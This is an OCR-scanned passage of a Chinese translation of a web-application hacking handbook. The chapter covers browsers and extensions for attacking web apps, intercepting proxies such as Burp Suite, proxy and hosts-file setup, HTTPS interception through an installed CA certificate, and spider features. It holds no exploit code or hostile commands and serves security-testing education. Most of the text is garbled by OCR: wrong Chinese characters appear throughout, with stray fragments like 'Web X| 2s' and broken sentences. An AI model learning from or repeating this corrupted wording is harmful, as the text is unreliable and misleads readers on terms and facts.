黑客 工具 包 中 最 重要 的 工具 属于 后 者 ， 它 作为 Web 拦 截 代 理 服务 器 
运行 ， 允 许 碍 看 并 修改 浏览 器 与 目标 应 用 程序 之 间 传 送 的 所 有 HTTP 消 
恩 。 近 些 年 来 ， 基 本 的 拦截 代理 服务 器 已 经 及 展 成 为 功能 强大 的 集成 工 
具 套 件 ， 拥 有 大 量 旨 在 帮助 黑客 攻击 Web 应 用 程序 的 功能 。 本 章 将 介绍 
这 类 工具 的 作用 原理 ， 并 说 明 如 何 充分 利用 它们 的 功能 。 

第 二 类 主要 的 工具 为 Web 应 用 程序 扫描 器 。 这 种 产品 则 在 将 攻击 
Web 应 用 程 友 过 程 中 的 许多 任务 自动 化 ， 涵 盖 初 步 解析 一 直到 探查 漏洞 
等 过 程 。 我 们 将 分 析 Web 应 用 程序 扫描 器 的 内 在 优 缺 点 ， 并 简要 介绍 这 
个 领域 内 几 球 当前 市 场 领先 的 产品 。 

最 后 ， 还 有 很 多 定制 的 小 型 工具 都 可 在 测试 Web 应 用 程序 时 执行 特 
定 的 任务 。 昌 然 渗透 测试 员 可 能 只 是 偶尔 使 用 这 些 工 具 ， 但 事实 证 明 ， 
在 特殊 情况 下 ， 它 们 极其 有 用 。 























20.1 Web X| 2s 


Web 浏 览 器 其 实 并 不 是 一 种 攻击 工具 ， 而 是 访问 Web 应 用 程序 的 标 
准 方法 。 然 而 ， 在 攻击 Web 应 用 程序 时 ， 渗 透 测试 员 选择 的 Web 浏 览 器 
会 影响 攻击 效率 。 此 外 ， 还 有 各 种 针对 不 同类 型 浏览 器 的 扩展 可 帮助 渗 
天 测试 员 实 施 攻 击 。 本 池 将 简要 介绍 3 种 流行 的 浏览 大 以 及 它们 的 一 些 
FE 





20.1.1 Internet Explorer 





Microsoft} Internet Explorer (IE) 是 当前 应 用 最 广泛 的 Web 浏 览 
器 。 据 估计 ， 现 在 依然 如 此 ， 正 市 场 占 有 率 大 约 为 45%。 几 乎 所 有 的 
Web 应 用 程序 都 针对 下 设计 ， 并 通过 下 进行 测试 ， 这 使 得 它 成 为 攻击 者 
的 首选 浏览 器 ， 因 为 大 多 数 应 用 程序 的 内 容 与 功能 都 能 够 在 正中 正确 显 
示 和 和 使用。 而且， 其 他 浏览 器 本 身 并 不 支持 ActiveX 控 件 ， 因 此 ， 如 果 
一 个 应 用 程序 使 用 这 种 控件 ， 就 必须 使 用 正 来 浏览 它 。 使 用 下 的 局 限 性 
在 于 ， 与 使 用 其 他 浏览 器 不 同 ， 它 必须 在 Microsoft Windows 平 台 上 运 
行 。 

由 于 下 被 人 们 广泛 使 用 ， 因 此 ， 当 测试 路 站 点 脚本 与 其 他 针对 应 用 
程序 用 户 的 攻击 时 ， 应 该 始终 确保 攻击 能 够 在 这 种 浏览 器 上 成 功 实施 
〈 请 参阅 第 12 章 了 解 相关 内 容 ) 。 











.= 


=> 注解 Internet Explorer 8 引入 了 一 个 默认 处 于 启用 状态 的 反 
XSS 匀 选 锋 。 如 第 12 章 所 述 ， 此 科 选 器 会 党 试 阻止 大 多 数 标准 的 
XSS 攻 击 ， 因 此 ， 在 针对 目标 应 用 程序 测试 XSS 入 侵 程 序 时 ， 该 得 
选 器 可 能 会 导致 问题 。 通 铝 ， 在 测试 过 程 中 应 禁用 该 XSS 筛 选 器 。 
在 确认 某 个 XSS 漏 洞 后 ， 最 好 是 重新 启用 该 科 选 器 ， 看 是 否 可 以 利 
用 发 现 的 漏洞 找到 避 开 该 往 选 器 的 方法 。 


以 下 IE 扩 展 有 助 于 攻击 Web 应 用 程序 。 
口 HttpWatch 可 分 析 所 有 HTTP 请 求 与 啊 应 ， 提 供 消息 涉 、cookie、 
URL、 请 求 参 数 、HTTP 状 态 码 与 重 定向 等 信息 《如 图 20-1 所 示 ) 。 
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图 20-1 HttpWatch 对 Internet Explorer% 4p HNHTTP RITAN 


口 IEWatch 的 功能 与 HttpWatch 类 似 ， 同 时 还 可 分 析 HTTP 文 档 、 图 
像 、 脚 本 等 。 


20.1.2 Firefox 


Firefox 是 当前 第 二 大 Web 浏 览 器 ， 据 估计 ， 市 场 占有 率 大 约 为 
35%。 绝 大 多 数 Web 应 用 程序 可 在 Firefox 上 正常 运行 ， 但 是 ， 它 本 身 并 
不 支持 ActiveX 控 件 。 

不 同 的 浏览 右 在 处 理 HTML 方 面 存在 许多 细微 的 大 异 ， 特 别 是 当 
HTML 并 不 严格 符合 标准 时 。 通 常 ， 如 果 一 个 应 用 程序 针对 跨 站 点 脚本 
实施 防御 ， 这 意味 着 针对 它 的 攻击 并 不 会 对 每 种 浏览 器 平台 有 效 。 
Firefox 的 普及 使 得 这 种 浏览 器 成 为 XSS 攻 击 的 主要 目标 ;| 因此 ， 如 果 在 
IE 上 实施 XSS 攻 击 过 到 困难 ， 应 该 尝试 在 Firefox 上 测试 这 些 攻 击 。 此 
外 ， 之 前 ， 针 对 下 无效 的 许多 攻击 能 够 对 Firefox 实 施 ， 主 要 因为 它 的 某 
些 特 有 功能 ， 参 见 第 13 章 了 解 这 方面 的 内 容 。 

当 攻 击 Web 应 用 程序 时 ， 有 大 量 Firefox 浏 览 器 扩展 可 供 使 用 ， 如 下 














所 示 。 


口 Http Watch 也 适用 于 Firefox。 
口 FoxyProxy 能 够 灵活 管理 浏览 器 的 代理 设置 ， 可 实现 迅速 切换 以 


及 为 不 同 的 URL 设 置 不 同 的 代理 等 。 


同 代 
的 每 


包括 
度 限 


口 LiveHTTPHeaders 可 修改 请 求 与 啊 应 ， 并 重新 发 布 个 别 请 求 。 

口 使 用 PrefBar 可 启用 或 禁用 cookie、 快 速 进行 访问 控制 检查 、 在 不 
理 服 务 器 之 间 切 换 、 清 除 缓存 ， 以 及 打开 浏览 器 的 用 户 代 理 。 

口 Wappalyzer 可 确定 当前 页 面 使 用 的 各 种 技术 ， 并 在 URL 栏 为 发 现 
一 种 技术 显示 一 个 图 标 。 

口 Web Developer 工 具 栏 提供 了 大 量 有 用 功能 。 其 中 最 重要 的 功能 
查看 页 面 上 的 所 有 链接 、 更 改 HTML 使 表单 字段 可 写 、 取 消 最 大 长 
制 、 显 示 隐 藏 表单 字段 ， 以 及 将 请 求 方法 由 GET 更 改 为 POST。 








.3 Chrome 


20.1 


用 户 


击 时 
因此 


在 浏览 器 领域 ，Chrome 是 一 款 相 对 较 新 的 浏览 器 ， 但 它 迅 速 启 得 
的 欢迎 ， 并 占领 了 约 15% 的 市 场 。 

攻击 Web 应 用 程序 可 能 会 用 到 各 种 Chrome 浏 览 器 扩展 ， 如 下 所 示 。 
O XSS Rays， 该 扩展 可 用 于 测试 XSS 漏 洞 和 DOM 检 测 。 

D cookie 编 辑 器 ， 用 于 在 浏览 器 中 查看 和 编辑 cookie。 

口 Wappalyzer 也 可 以 用 于 Chrome。 

口 Web Developer 工具 栏 也 可 以 用 于 Chrome。 

Chrome 可 能 包含 一 些 奇怪 的 功能 ， 在 构建 针对 XSS 和 其 他 漏洞 的 攻 
， 这 些 功能 可 能 会 有 用 。 由 于 Chrome 是 一 款 相 对 较 新 的 浏览 器 ， 

， 在 未 来 数 年 中 ， 研 究 这 些 功能 可 能 会 取得 一 定 的 成 果 。 








20.2 集成 测试 


当 攻 击 Web 应 用 程序 时 ， 除 基本 的 Web 浏 览 嚣 外， 工具 包 中 最 有 用 
的 工具 为 拦截 代理 服务 器 。 在 web 应 用 程序 发 展 的 早期 ， 拦 截 代 理 服 务 
器 是 一 种 独立 的 工具 ， 它 提供 最 基本 的 功能 ，Achilles 代 理 服 务 器 是 尤 
其 受 推 党 的 一 种 ， 它 显示 每 一 个 请 求 与 响应 ， 以 方便 对 其 进行 编辑 。 虽 
然 这 球 工 具 极 其 人 简单， 存在 许多 缺陷 ， 而 且 使 用 起 来 也 不 方便 ， 但 经 验 
丰富 的 攻击 者 仍然 可 以 利用 它 攻 破 许 多 Web 应 用 程序 。 

近年 来 ， 这 款 简 单 的 拦截 代理 服务 器 已 经 发 展 成 为 许多 功能 强大 的 
工具 套件 ， 包 含 几 种 相互 补充 的 工具 ， 能 够 完成 攻击 Web 应 用 程序 过 程 
中 的 常见 任务 。Web 应 用 程序 安全 测试 仪 常用 的 测试 套件 如 下 所 示 : 

DQ Burp Suite 

口 WebScarab 

LJ Paros 

O Zed Attack Proxy 

D Andiparos 

O Fiddler 

DCAT 

D Charles 

这 些 工 具 包 的 功能 各 不 相同 ， 其 中 一 些 相对 较 新 ， 并 更 具 实 验 性 。 
单纯 就 功能 而 言 ，Burp Suite 是 其 中 最 为 复杂 全 面 的 工具 。 当 前 ， 它 是 
唯一 包含 以 下 几 节 介绍 的 所 有 功能 的 工具 包 。 在 某 种 程度 上 上， 选择 使 用 
哪些 工具 因 个 人 喜好 而 异 。 我 们 建议 没有 任何 喜好 的 测试 员 在 现实 应 用 
中 先 选 择 几 种 套件 ， 然 后 确定 哪些 工具 最 适合 自己 的 需求 。 

本 节 介 绍 这 些 工具 的 工作 原理 ， 并 说 明 在 测试 Web 应 用 程序 时 充分 
利用 这 些 工 具 的 常用 工作 流程 。 


20.2.1 工作 原理 

上 述 每 一 种 集成 测试 套件 都 由 几 种 相互 补充 的 工具 组 成 ， 它 们 共有 至 
与 目标 应 用 程序 有 关 的 信息 。 通 常 ， 攻 击 者 通过 浏 贤 占 以 正 第 方式 攻击 
应 用 程序 ， 这 些 工 具 监控 生成 的 请 求 与 啊 应 ， 保 存 所 有 与 目标 应 用 程序 
有 关 的 信息 ， 并 提供 大 量 有 用 的 功能 。 每 一 种 套件 由 以 下 核心 组 件 构 


成 : 
口 拦截 代理 服务 器 









































口 Web 应 用 程序 爬虫 
口 自 定义 Web 应 用 程序 漏洞 测试 器 
口 漏洞 扫描 器 
a 手动 请 求 工具 
口 分 析 会 话 cookie 与 其 他 令 牌 的 工具 
口 各 种 其 k 享 功能 与 实用 工具 
1， 拦 截 代 理 服务 器 

拦截 代理 服务 器 是 工具 套件 的 核心， 至 今 仍然 是 最 基本 的 组 件 。 要 
使 用 拦截 代理 服务 器 ， 必 须 配置 浏览 器 ， 将 它 的 代理 服务 器 作为 本 地 机 
器 上 的 一 个 端口 。 同时 配置 代理 工具 监听 这 个 端 口 ， 并 接收 由 浏览 器 发 
布 的 所 有 请 求 。 由 于 代理 服务 器 能 多 访问 浏览 器 与 目标 Web 服 务 器 之 间 
的 双向 通信 ， 因 而 它 能 够 拦截 它们 之 间 传 送 的 每 一 条 消息 ， 以 方便 用 户 
审查 和 修改 ， 并 执行 其 他 有 用 的 功能 ， 如 图 20-2 所 示 。 
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图 20-2 ”使 用 拦截 代理 服务 器 动态 处 理 HITP 请 求 





9 配置 浏览 器 


DAS AC ES fe. SG, ARE ERR HER EA 
哪 一 个 本 地 端口 监听 连接 〈 通 常 为 8080 端 口 ) ， 然 后 在 浏览 器 上 执行 以 
下 步骤 。 

口 在 Internet Explorer 中 ， 选 择 “ 工 具 ”-,“Internet 选 项 ” “ERE” “局 
域 网 设置 "。 确 保 没有 选中 “自动 检测 设置 ”与 “使 用 上 自动 配置 脚本 ” 复 选 
框 。 确 保 选 中 “为 LAN 使 用 代理 服务 器 * 复 选 框 。 在 “地 址 ” 栏 中 输入 
127.0.0.1; 在 “端口 * 栏 中 输入 代理 服务 器 使 用 的 端口 。 单 击 “ 高 级 ” 按 
钮 ， 确 保 选 中 “对 所 有 协议 均 使 用 相同 的 代理 服务 器 * 复 选 框 。 如 果 所 攻 
击 的 主机 名 称 与 “对 于 以 下 列 字 符 开 头 的 地 址 不 使 用 代理 服务 器 ? 框 中 的 
任何 一 个 表达 式 相 匹配 ， 删 除 这 些 表 达 式 。 在 所 有 对 话 框 上 单 击 “ 确 
定 ” 按 钮 ， 确 认 重 新 配置 。 

O 在 Firefox 中 ， 选 择 “ 工 具 ”J“ 选 项” “高级”*”， 选 择 “ 网 络 ” 选 项 
卡 ， 单 击 “ 连 接 ” 栏 的 “设置 ”按钮 ， 确 保 选 中 “手动 配置 代理 ”选项 。 在 “ 代 
理 ” 栏 中 输入 127.0.0.1; 在 “端口 ? 栏 中 输入 代理 服务 器 使 用 的 端口 。 如 果 
所 攻击 的 主机 名 称 与 “不 使 用 代理 ? 框 中 的 任何 一 个 表达 式 相 匹配 ， 删 除 
这 些 表 达 式 。 在 所 有 对 话 框 上 单 击 “ 确 定 ” 按 钮 ， 确 认 重 新 配置 。 

口 Chrome 使 用 其 所 在 的 操作 系统 附 帝 的 本 地 浏览 器 的 代理 设置 。 在 
Chrome 中 ， 可 以 通过 选择 “选项 ” “高 级 选项 ” “网 络 ” ~ “更改 代理 设 
BWM cee. 














处 理 “ 不 文 持 代 理 ? 的 客户 端 


有 时 ， 测 试 员 需 要 测试 使 用 在 浏览 器 以 外 运行 的 厚 客户 端的 应 
用 程序 。 许 多 这 类 客户 端 并 不 提供 任何 用 于 配置 HITP 代 理 服务 器 
的 设置 。 它 们 只 是 尝试 直接 连接 到 托管 应 用 程序 的 Web 服 务 器 。 这 
种 行为 导致 测试 员 根 本 无 法 使 用 拦截 代理 服务 器 来 查看 和 修改 应 用 
程序 的 流量 。 

幸好 ， 在 这 种 情况 下 ， 测 试 员 可 以 利用 Burp Suite 提 供 的 一 些 
功能 继续 完成 测试 。 为 此 ， 测 试 员 需要 执行 以 下 步骤 : 

(1) 修改 操作 系统 hosts 文 件 ， 将 应 用 程序 使 用 的 主机 名 解析 
为 测试 员 自 己 的 回环 地 址 (127.0.0.1) 。 例 如 : 127.0.0.1 
www.wahh-app.com 这 会 导致 厚 客户 端的 请 求 被 重 定 问 到 测试 员 自 
己 的 计算 机 。 

(2) 对 于 应 用 程序 使 用 的 每 个 目标 端口 (通常 为 80 和 443 站 
口 ) ， 在 回环 接口 的 这 些 端口 上 配置 一 个 Burp Suite 监 听 器 ， 并 将 
该 监 昕 器 设置 为 文 持 匿名 代理 。 匿 名 代理 功能 指 监 昕 器 将 接受 厚 客 
J o 的 非 代 理 类 型 的 请 求 ( 这 些 请 求 已 被 重 定 同 到 测试 员 的 回 
环 地 址 ) 。 

(3) 匿名 模式 代理 支持 HTTP 和 HTTPS 请 求 。 为 防止 SSL 遇 到 
致命 的 证 书 错误 ， 可 能 需要 将 匿名 代理 监听 器 配置 为 显示 包含 厚 客 
户 端 期 望 的 特定 主机 名 的 SSL 证 书 。 下 文 将 详细 说 明 如 果 避 人 免 拦 截 
代理 服务 器 导致 的 证 书 问题 。 

(4) 对 于 已 使 用 hosts 文 件 重 定向 的 每 个 主机 名 ， 配 置 Burp 将 
主机 名 解析 为 其 原始 的 他 地 址 。 这 些 设置 位 于 
Options + Connections = Hostname Resolution (选项 ,连接 主机 名 
解析 ) 下 。 测 试 员 可 以 通过 这 些 设置 指定 域名 到 IP 地 址 的 定制 映 
射 ， 以 履 盖 计算 机 上 自己 的 DNS 解析 。 这 样 ，Burp 提 出 的 出 站 请 求 将 
指出 正确 的 目标 服务 器 。 【如果 不 执行 此 步骤 ， 请 求 将 在 无 限 循 环 
中 重 定向 到 测试 员 自 己 的 计算 机 。) 

(5) 在 匿名 模式 下 运行 时 ，Burp Proxy 将 确定 应 使 用 在 请 求 中 
显示 的 Host 消 息 头 将 每 个 请 求 转发 到 的 目标 主机 。 如 果 所 测试 的 厚 
客户 端 未 在 请 求 中 包含 Host 消 彼 头 ，Burp 将 无 法 正确 转发 请 求 。 如 
果 只 需 处 理 一 个 目标 主机 ， 可 以 通过 将 匿名 代理 监 昕 器 配置 为 将 所 












































有 请 求 重 定向 到 所 需 目 标 主机 来 解决 这 一 问题 。 但 如 果 要 处 理 多 个 
目标 主机 ， 则 需要 在 多 台 计 算 机 上 运行 多 个 Burp 实 例 ， 并 使 用 hosts 
文件 将 每 个 目标 主机 的 流量 重 定 问 到 其 他 拦截 服务 器 。 


9 拦截 代理 服务 器 与 HTTPS 

如 第 3 章 所 述 ， 当 处 理 未 加 密 的 HTTP 通 信 时 ， 拦 截 代理 服务 器 与 普 
通 的 Web 代 理 服务 器 的 工作 原理 基本 相同 。 浏 览 器 首先 向 代理 服务 器 发 
送 标准 的 HTTP 请 求 ， 不 同 之 处 在 于 ， 请 求 第 一 行 的 URL 包 含 目 标 Web 
服务 器 的 完整 主机 名 称 。 代 理 服务 器 将 这 个 主机 名 称 解析 成 一 个 IP 地 
址 ， 把 请 求 转换 为 标准 的 非 代 理 形式 ， 然 后 将 它 转 发 给 目标 服务 器 。 当 
该 服务 器 做 出 啊 应 时 ， 代 理 服 务 器 就 会 将 啊 应 转发 给 客户 端 浏览 器 。 

对 于 HTTPS 通 信 ， 浏 览 器 首先 使 用 CONNECT 方 法 回 代 理 服 务 器 提 
出 一 个 明文 请 求 ， 指 定 目标 服务 器 的 主机 名 称 与 端口 。 如 果 使 用 普通 的 
GEER) 代理 服务 器 ， 代 理 服务 器 就 会 以 一 个 HTTP 200 状 态 码 做 出 
响应 ， 一 直 开 放 TCP 连 接 ， 从 此 以 后 (对 该 连接 而 言 ) 作 为 目标 服务 器 
的 TCP 级 中 继 。 然 后 ， 浏 览 器 将 与 目标 服务 器 进行 一 次 SSL 握 手 ， 建 立 
条 安全 信道 ， 通 过 它 传 送 HTTP 消 息 。 当 使 用 拦截 代理 服务 器 时 ， 为 
使 代理 服务 器 访问 浏览 器 通过 信道 传送 的 HTTP 消息 ， 这 个 过 程 会 稍 有 
不 同 。 如 图 20-3 所 示 ， 用 一 个 HITP 200 状 态 码 响应 CONNECT 请 求 后 ， 
拦截 代理 服务 器 并 不 作为 一 个 中 继 ， 而 是 在 服务 器 端 与 浏览 器 进行 SSL 
握手 。 它 还 作为 一 个 SSL 客 户 端 ， 与 目标 Web 服 务 器 进行 另 一 次 SSL 担 
手 。 因 此 ， 这 个 过 程 建立 两 条 SSL 信 道 ， 代 理 服务 器 则 作为 它们 之 间 
的 “中 间 人 ”。 这 样 ， 代 理 服务 器 就 能 够 解密 从 每 条 信道 收 到 的 所 有 消 
A 然后 重新 对 其 进行 加 密 ， 以 通过 另 一 条 信道 
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图 20-3 通过 拦截 代理 服务 器 查看 和 修改 HTTPS 通 信 














当然 ， 如 果 攻 击 者 处 在 适当 的 位 置 ， 他 就 能 够 拦截 浏览 器 与 目标 服 
务 器 之 间 的 通信 ， 并 且 不 会 被 发 现 ;， 这 时 ， 由 于 SSL 无 法 保护 浏览 器 与 
服务 器 之 间 通 信 的 隐秘 性 与 完整 性 ， 它 也 就 失去 了 作用 。 为 此 ， 当 进行 
SSL 握 手 时 ， 就 必须 使 用 加 密 证 书 来 验证 每 一 方 的 身份 ， 这 点 尤为 关 
键 。 为 了 在 服务 器 端 与 浏览 器 进行 SSL 握 手 ， 拦 截 代 理 服务 器 必须 使 用 

它 自己 的 SSL 证 书 ， 因 为 它 并 不 知道 目标 服务 器 所 使 用 的 私 钥 。 

在 这 种 情况 下 ， 为 防止 攻击 ， 浏 览 器 会 向 用 户 提 出 警告 ， 提 醒 他 们 
检查 伪造 的 证 书 ， 并 自行 决定 是 否 信任 该 证 书 。 图 20-4 为 正 显示 的 警 
He A 当 使 用 拦截 代理 服务 器 时 ， 浏览 器 与 代理 服务 器 都 完全 由 攻 
二 者 控制 因此 它们 将 接受 伪造 的 证 书 ， 并 允许 代理 服务 器 建立 两 条 
SSL 信 道 
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图 20-4 ”使 用 采用 HTTPS 通 信 的 拦截 代理 服务 器 将 在 攻击 者 的 浏览 器 中 生成 警告 












































使 用 浏览 器 测试 使 用 单一 域 的 应 用 程序 时 ， 以 这 种 方式 处 理 浏览 碍 
安全 警告 和 接受 代理 服务 器 的 自 造 证 书 通 常 不 会 遇 到 问题 。 但 是 ， 在 其 
他 情况 下 仍 有 可 能 出 现 问 题 。 当 前 的 许多 应 用 程序 需要 针对 图 像 、 脚 本 
代码 和 其 他 资源 提出 大 量 跨 域 请 求 。 在 使 用 HTTPS 时 ， 每 一 个 指 问 外 部 
域 的 请 求 都 会 导致 浏览 器 收 到 代理 服务 器 的 无 效 SSL 证 书 。 在 这 种 情况 
下 ， 浏 览 器 通常 不 会 回 用 户 提 出 警告 ， 因 此 也 不 会 为 用 户 提 供 接受 每 个 
域 的 无 效 SSL 证 书 的 选项 。 相 反 ， 浏 览 器 通常 会 丢弃 跨 域 请 求 ， 要 么 直 
接 丢 弃 ， 要 么 显示 一 条 警告 ， 指 出 请 求 已 被 丢弃 。 

使 用 在 浏览 器 以 外 运行 的 厚 客户 并 时 ， 代 理 服务 器 的 自 造 SSL 证 书 
也 会 导致 问题 。 通 常 ， 如 果 收 到 无 效 SSL 证 书 并 且 无 法 接受 该 证 书 ， 将 
无 法 与 这 些 客户 并 建立 连接 。 

泣 好 ， 有 一 个 简单 的 方法 可 以 解决 上 述 问 题 。 在 安装 时 ，Burp 
Suite 会 为 当前 用 户 生 成 一 个 唯一 的 CA 证 书 ， 并 将 该 证 书 存储 在 本 地 计 
算 机 上 。 当 Burp Proxy 收 到 指 癌 新 域 的 HTTPS 请 求 时 ， 它 会 为 这 个 域 动 
态 创建 新 的 主机 证 书 ， 并 使 用 以 上 CA 证 书签 署 此 证 书 。 这 意味 着 用 户 
可 以 在 其 浏览 器 (或 其 他 信任 库 〉 中 将 Burp 的 CA 证 书 安装 为 可 信和 根 证 
书 。 这 样 ， 为 所 有 主机 生成 的 证 书 被 视 为 有 效 证 书 ， 因 而 避免 了 代理 服 
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安装 CA 证 书 的 精确 方法 因 浏览 器 和 平台 而 异 。 基 本 上 ， 安 装 过 程 
包括 以 下 步骤 。 

C1) 使 用 浏览 器 通过 代理 服务 如 访问 任何 HPPTS URL. 

(2) 在 生成 的 浏览 器 警告 中 ， 展 开 证 书 链 ， 在 证 书 树 〈 称 为 
PortSwigger CA) 中 选择 根 证 书 。 

(3) 将 此 证 书 作为 可 信和 根 证 书 或 证 书 颁 发 机 构 导 入 浏览 器 。 可 能 
需要 先导 出 此 证 书 ， 然 后 再 单独 将 其 导入 《〈《 因 浏览 右 而 异 ) 。 

有 关 在 不 同 浏览 器 上 安装 Burp CA 证 书 的 详细 说 明 ， 请 参阅 位 于 以 
下 URL 的 Burp Suite 在 线 文档 : 

http://portswigger.net/burp/help/servercerts.html 

O 共同 特性 

除 拦 截 和 修改 请 求 与 响应 这 种 核心 功能 外 ， 拦 截 代 理 服 务 器 还 包含 
人 
5 ny cK 4 

口 详 细 的 拦截 规则 。 根 据 目标 主机 、URL、 方 法 、 资 源 类 型 、 啊 应 
码 或 出 现 的 特殊 表达 式 〈 见 图 20-5) 等 标准 拦截 消息 ， 然 后 审查 或 暗中 
转发 这 些 消 恩 。 在 一 般 的 应 用 程序 中 ， 渗 透 测试 员 对 绝 大 多 数 的 请 求 与 
吓 应 都 不 感 兴趣 ， 他 可 以 利用 这 项 功能 配置 代理 服务 器 仅 标记 感 兴趣 的 
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图 20-5 Burp 代 理 服 务 器 文 持 详细 的 请 求 与 啊 应 拦截 规则 











口 所 有 请 求 与 啊 应 的 详细 历史 记录 。 通 过 它 可 审查 之 前 传送 的 消 
恩 ， 并 可 将 它们 传送 给 套件 中 的 其 他 工具 ， 以 进行 深入 分 析 (参见 图 
20-6) 。 可 以 过 滤 和 搜索 拦截 历史 记录 ， 从 而 迅速 查找 特定 数据 项 ， 还 
可 以 标注 感 兴趣 的 条 目 ， 以 便 将 来 引用 。 
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图 20-6 ”代理 服务 器 历史 记录 ， 人 允许 攻击 者 通过 代理 服务 器 查看 、 过 滤 、 搜 索 和 标 
记 请 求 和 响应 





























口 用 于 动态 修改 请 求 与 啊 应 内 容 的 目 动 匹配 与 蔡 换 规 则 。 这 项 功能 
的 用 途 广泛 ， 例 如 ， 在 所 有 请 求 中 修改 某 个 cookie 或 其 他 参数 的 值 ， 删 
除 绥 存 指令 ， 用 User-Agent 消 息 头 模拟 某 个 特殊 的 浏览 器， 等 等 。 

口 除 客户 端 UI 外 ， 直 接 通 过 浏览 器 访问 代理 服务 占 的 功能 。 渗 透 济 
试 员 可 以 使 用 这 项 特性 浏览 代理 历史 ， 从 浏览 占 中 重新 发 布 请 求 ， 从 而 
以 正常 方式 处 理 并 拦截 啊 应 。 

口 操 纵 HITTP 消 息 格 式 的 实用 工具 ， 如 在 不 同 的 请 求 方法 与 内 容 编 
人 码 之 间 进 行 转换 。 有 时 ， 渗 透 测试 员 还 可 以 使 用 这 些 工 具 优 化 跨 站 点 脚 
本 之 类 的 攻击 。 

口 能够 实时 自动 地 修改 某 些 HTML 特 性 ， 如 显示 隐藏 表单 字段 ， 删 
除 输 入 字段 限制 以 及 删除 JavaScript 表 单 确 认 。 
2. Web 应 用 程序 爬虫 

Web 应 用 程序 爬虫 的 工作 机 制 与 传统 的 Web 疏 虫 类 似 : 请 求 Web 页 
面 ， 解 析 这 些 页 面 ， 从 中 得 找 指 同 其 他 页 面 的 链接 ， 然 后 辐 它 们 提出 请 























求 ; 继续 这 个 过 程 ， 直 到 得 明 一 个 站 点 的 全 部 内 容 。 为 适应 功能 性 Web 
应 用 程序 与 传统 Web 站 点 之 间 的 差异 ， 应 用 程序 爬虫 不 仅 需 要 实现 其 核 
心 功 能 ， 还 要 应 对 其 他 各 种 挑战 ， 如 下 所 示 。 
口 基 于 表单 的 导航 ， 使 用 下 拉 列 表 、 文 本 输入 和 其 他 方法 。 
口 基 于 JavaScript 的 导航 ， 如 动态 生成 的 菜单 。 
口 要 求 按 预 定 顺序 执行 操作 的 多 阶段 功能 。 
口 验证 与 会 话 。 
口 使 用 基于 参数 的 标识 符 ， 而 非 URL， 指 定 不 同 的 内 容 与 功能 。 
口 在 URL 碍 询 字 符 串 中 出 现 令 牌 和 其 他 易 变 参 数 ， 导 致 确定 特殊 内 
容 出 现 问题 。 

集成 测试 套件 通过 在 拦截 代理 服务 器 与 爬虫 组 件 之 间 共 享 数据 ， 解 
决 了 上 述 几 个 问题 。 这 样 ， 渗 透 测 试 员 就 能 够 以 正常 方式 使 用 目标 应 用 
程序 ， 由 代理 服务 器 处 理 所 有 请 求 ， 并 将 其 提交 给 爬虫 进行 深入 分 析 。 
因此 ， 浏 览 器 将 会 留意 任何 不 常见 的 导航 、 验 证 与 会 话 处 理 机 制 ， 人 允许 
渗透 测试 员 完 全 控制 仆 虫 ， 彻 底 搜索 应 用 程序 的 内 容 。 这 种 由 用 户 指 导 
的 抓 取 技 巧 己 在 第 4 章 详 细 介 绍 了 。 收 集 到 尽 可 能 多 的 信息 后 ， 扑 虫 束 
可 以 自行 进行 深入 调查 ， 进 而 发 现 其 他 内 容 与 功能 。 

下 面 是 Web 应 用 程序 息 虫 所 执行 的 常用 功能 。 

口 使 用 通过 拦截 代理 服务 器 访问 的 URL 自 动 更 新 站 点 地 图 。 

口 被 动 抓 取 代理 服务 器 处 理 的 内 容 ， 从 中 解析 出 链接 ， 无 须 请 求 这 
些 链 接 就 将 它们 添加 到 站 点 地 图 中 《〈 见 图 20-7) 。 
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图 20-7 ”被 动 抓 取 结 果 ， 以 灰色 显示 的 条 目 没有 经 过 请 求 ， 但 通过 被 动 抓 取 确认 了 


口 以 表格 和 树 状 形式 呈现 所 发 现 的 内 容 ， 方 便 对 这 些 结果 进行 搜 


口 对 自动 抓 取 的 范围 进行 细 化 控制 。 这 样 就 可 以 指定 爬虫 抓 取 的 主 
机 名 称 、 卫 地址 、 目 录 路 径 、 文 件 类 型 等 ， 以 对 某 一 个 特殊 的 功能 区 域 
进行 抓 取 ， 防 止 肘 虫 访 问 目标 应 用 程序 基础 架构 之 内 或 之 外 的 无 关 链 
接 。 这 项 功能 还 有 助 于 防止 仆 虫 抓 取 管理 接口 之 类 的 强大 功能 ， 因 为 这 
样 做 可 能 会 导致 危险 的 负面 影响 ， 如 删除 用 户 账户 。 它 还 可 用 于 防止 疏 
虫 请 求 退出 功能 ， 使 当前 会 话 失 效 。 

人 脚本 、 注 释 和 图 像 ， 并 在 站 点 地 图 内 分 析 
这 些 内 容 。 

口 解 析 JavaScript 内 容 ， 查 找 URL 与 资源 名 称 。 即 使 应 用 程序 并 没有 
使 用 完整 的 JavaScript 引 擎 ， 这 项 功能 也 有 助 于 爬虫 发 现 基 于 JavaScript 
的 导航 ， 因 为 它们 通常 以 字面 量 的 形式 出 现在 脚本 中 。 

口 使 用 适当 的 参数 根据 用 户 的 指导 自动 提交 表单 〈 见 图 20-8) 。 


submit form penso 
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Burp Spider needs your guidance to submit a login form. Please choose the value of each form 
field which should be used when submitting the form. You can control how Burp handles forms in 
the Spider options tab. 


action URL: https /mosec nevauth/4/Default ashx 
method POST 
typ name alue 
text usemame 
pas 435 


submit form ignore form 
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口 探 查 自 定义 的 “文件 未 发 现 ” 啊 应 。 妆 请 求 一 个 无 效 的 资源 时 ， 许 
多 应 用 程序 返回 一 条 HTTP 200 消 息 。 如 果 扑 虫 无 法 识别 这 种 消息 ， 得 


到 的 内 容 地 图 就 可 能 包含 错误 信息 。 
口 检 查 robots.txt 文 件 ， 该 文件 提供 一 份 列 出 禁止 抓 取 的 URL 黑 名 
单 ， 但 攻击 爬虫 可 以 利用 它 发 现 其 他 内 容 。 
口 目 动 获取 所 有 枚 举 出 的 目录 的 根 上 日 录 。 这 些 内 容 可 用 于 检查 目录 
列表 或 默认 内 容 〈 请 参阅 第 17 章 了 解 相关 内 容 ) o 
i ra a 在 通过 验证 的 会 话 中 
进行 抓 取 。 
a 自动 测试 每 个 页 面 的 会 话 依赖 性 。 这 包括 使 用 和 不 使 用 收 到 的 
cookie 请 求 的 每 个 页 面 。 如 果 提 出 的 两 种 请 求 得 到 相同 的 内 容 ， 那 么 该 
页 面 不 需要 会 话 或 验证 即 可 访问 。 这 种 功能 可 用 于 探查 一 些 访问 控制 漏 
洞 〈 请 参阅 第 8 章 了 解 相关 内 容 ) o 

